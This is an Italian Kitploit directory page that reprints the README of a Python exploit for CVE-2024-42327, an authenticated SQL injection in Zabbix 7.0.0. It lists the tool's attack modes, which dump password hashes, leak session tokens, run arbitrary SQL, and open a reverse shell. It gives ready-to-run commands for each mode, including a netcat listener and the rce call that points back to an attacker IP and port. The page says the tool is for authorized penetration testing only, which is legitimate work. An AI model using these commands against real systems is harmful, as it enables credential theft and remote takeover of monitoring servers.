Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-42327_Zabbix_SQLi — Questo è solo a scopo educativo. Per favore, non utilizzarlo contro sistemi non autorizzati. | Kitploit
Strumenti/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

Questo è solo a scopo educativo. Per favore, non utilizzarlo contro sistemi non autorizzati.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ Script di Exploit per Iniezione SQL su Zabbix 7.0.0

Uno script Python per sfruttare una vulnerabilità di iniezione SQL autenticata su Zabbix 7.0.0, che supporta molteplici modalità di azione, tra cui estrazione di dati utente, perdita di token di sessione, esecuzione remota di comandi (RCE) e iniezione di query personalizzate.

⚠️ DISCLAIMER:
Questo script è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati.
Non utilizzarlo su sistemi di cui non sei proprietario o per i quali non hai esplicita autorizzazione.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.


✨ Funzionalità

  • ✅ Iniezione SQL autenticata contro Zabbix 7.0.0
  • 🧑‍💻 Estrai hash utenti dal database
  • 🔐 Perdita di token di sessione
  • 🐚 Esecuzione remota di comandi tramite reverse shell (richiede token admin)
  • 🧠 Esecuzione di query SQL personalizzate

🔧 Requisiti

  • Python 3.6+
  • Libreria requests

Installa i requisiti se necessario:

root@kitploit:~
pip install requests

🚀 Utilizzo

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODALITÀ> [argomenti opzionali...]

🔘 Modalità Disponibili

ModalitàDescrizioneRichiede Token Admin
leak-usersEstrae tutti gli ID utente, nomi utente, hash delle password e ruoli❌
leak-tokensEstrae tutti gli ID di sessione attivi dal database❌
rceAvvia una reverse shell tramite exploit item.create✅
customEsegue qualsiasi query SQL personalizzata tramite l'iniezione❌

🧪 Esempi

Estrai Hash Utente

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

Perdita Token di Sessione

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

Esecuzione Remota di Comandi (Reverse Shell)

root@kitploit:~
# Avvia prima un listener:
nc -lvnp 9001

# Poi esegui:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

Iniezione SQL Personalizzata

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 Struttura del Progetto

root@kitploit:~
sqliZabbix.py      # Script di exploit principale
README.md          # Questa documentazione

🧑‍💻 Autore

Anthony (@874anthony)

Realizzato con amore e curiosità 🐍

🔐 Licenza

Questo progetto è rilasciato sotto la licenza MIT. Si prega di usarlo responsabilmente.

Scarica lo strumento